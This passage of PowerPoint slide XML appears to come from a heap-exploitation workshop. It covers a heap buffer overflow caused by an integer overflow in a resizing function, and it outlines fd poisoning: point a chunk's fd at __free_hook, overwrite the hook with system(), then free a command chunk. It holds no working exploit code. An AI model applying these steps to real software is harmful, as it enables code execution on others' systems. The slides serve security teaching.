          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273846"/>
            <a:ext cx="4456651" cy="1075559"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Is This Even Exploitable?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AEA77A-2462-D594-D5E0-631257EA89F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142044" y="1236541"/>
            <a:ext cx="4943258" cy="2032904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Large initial string for overflow? Nope.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>huge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> string = crash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20" descr="Chart, histogram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA4EA7D-8721-2BB1-6B34-243A87717ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687349" y="0"/>
            <a:ext cx="4456651" cy="3038626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FD46A86-1738-948E-126C-FD3CF9164017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5331010" y="639397"/>
            <a:ext cx="3169328" cy="15358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B14157-0070-A73B-8EF3-6503937A9150}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5366582" y="662822"/>
            <a:ext cx="3031694" cy="15358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descr="Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30A5B8EE-E5FB-2E3F-A393-8855CB2E1062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="7831" t="13426" b="32935"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412995" y="2929631"/>
            <a:ext cx="8359973" cy="1597982"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A8A0F1-60AD-4053-15C9-5600F431F90B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4049698" y="3703060"/>
            <a:ext cx="176517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5FD181B-4E2F-4134-F8B0-5A5B357C2B39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6101919" y="4527613"/>
            <a:ext cx="2413431" cy="2030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ight Arrow 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05DD5945-5CC9-E97D-0928-BF1E2B36E400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6484306" y="595580"/>
            <a:ext cx="1029810" cy="72287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4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21C8-10E9-E840-14A1-29C862AA45AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="4254068" cy="867586"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Is This Even Exploitable?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Integer overflow in the resizing function">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691A22D7-4136-CF17-D130-F7F80F640300}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="7831" t="13426" b="32935"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="412995" y="2929631"/>
            <a:ext cx="8359973" cy="1597982"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13E65931-2A09-EFB4-5A10-E9C17D246FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4049698" y="3703060"/>
            <a:ext cx="176517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F4F2BA-C19B-2667-606D-14C174CC8933}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6101919" y="4527613"/>
            <a:ext cx="2413431" cy="2030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05AEA77A-2462-D594-D5E0-631257EA89F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="5186224" cy="1444515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Small initial string for overflow? Yes!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> buffer + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Slightly Bigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> string = Buffer Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Reasonable sized buffer overflow">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76EF192A-773B-65F2-C6AC-2E5F296D35E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5243373" y="92013"/>
            <a:ext cx="3405142" cy="2837618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Right Arrow 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B540E442-C8E9-582C-6024-D8DFCBCAE73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6945944" y="674244"/>
            <a:ext cx="1029810" cy="72287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4054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315B-FCC1-E894-F25B-26F2614FA6B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Complexity of Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B668F1A-5EF2-48A3-7495-F9822C3241FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3485805457"/>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7472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9ECC-2EB2-903B-8CEB-86A5E6E15991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many Ways to Exploit This!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40733D5A-E339-BD85-46F0-FB42EBF6BF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3901928803"/>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94218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E36D-790F-0239-56AA-A9B35501C7DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd Poison – Most Straight Forward</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E061D4D-B097-F59A-DEA0-905E03C7676E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Corrupt fd pointer in following chunk: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Point ‘fd’ to be at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free_hook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free_hook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system()’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free chunk with data for the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="System as the function pointer.&#10;- https://man7.org/linux/man-pages/man3/system.3.html">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC5D04B9-DE3C-CA06-B8A2-424F6582D7C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="19746" b="36278"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="16718" y="4585170"/>
            <a:ext cx="8995486" cy="521784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Free hook and command - first parameter lines up perfectly. ">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C20F7CF7-0CEF-AF2C-737F-28BD27941D7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="414106" y="3760299"/>
            <a:ext cx="5835774" cy="739746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25722109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75351-4F8E-EBF7-FF63-FC1D32DA084A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitable!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02097989-6E55-6390-617C-2D1AB74DB8E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2175867846"/>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3525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ECF9-600B-8E4A-8EE9-7D9E2FF44579}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Takeaways from the Workshop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E00CC37A-22B2-664B-9DEF-A70551EC71AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="4103148" cy="3263504"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How Malloc Works: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ordering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Classes: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap based buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use after free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Double free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A107DE83-5DDC-B843-86CD-CF12D96CAE03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731798" y="1236540"/>
            <a:ext cx="4103148" cy="3718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Techniques: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fd Poison</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overlapping Chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write-Where Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leaks + Grooming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real World:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source code auditing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Living off the land</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit dev</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="736862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1719-5CEE-4FC8-B6F0-9C5E3E3AE56D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
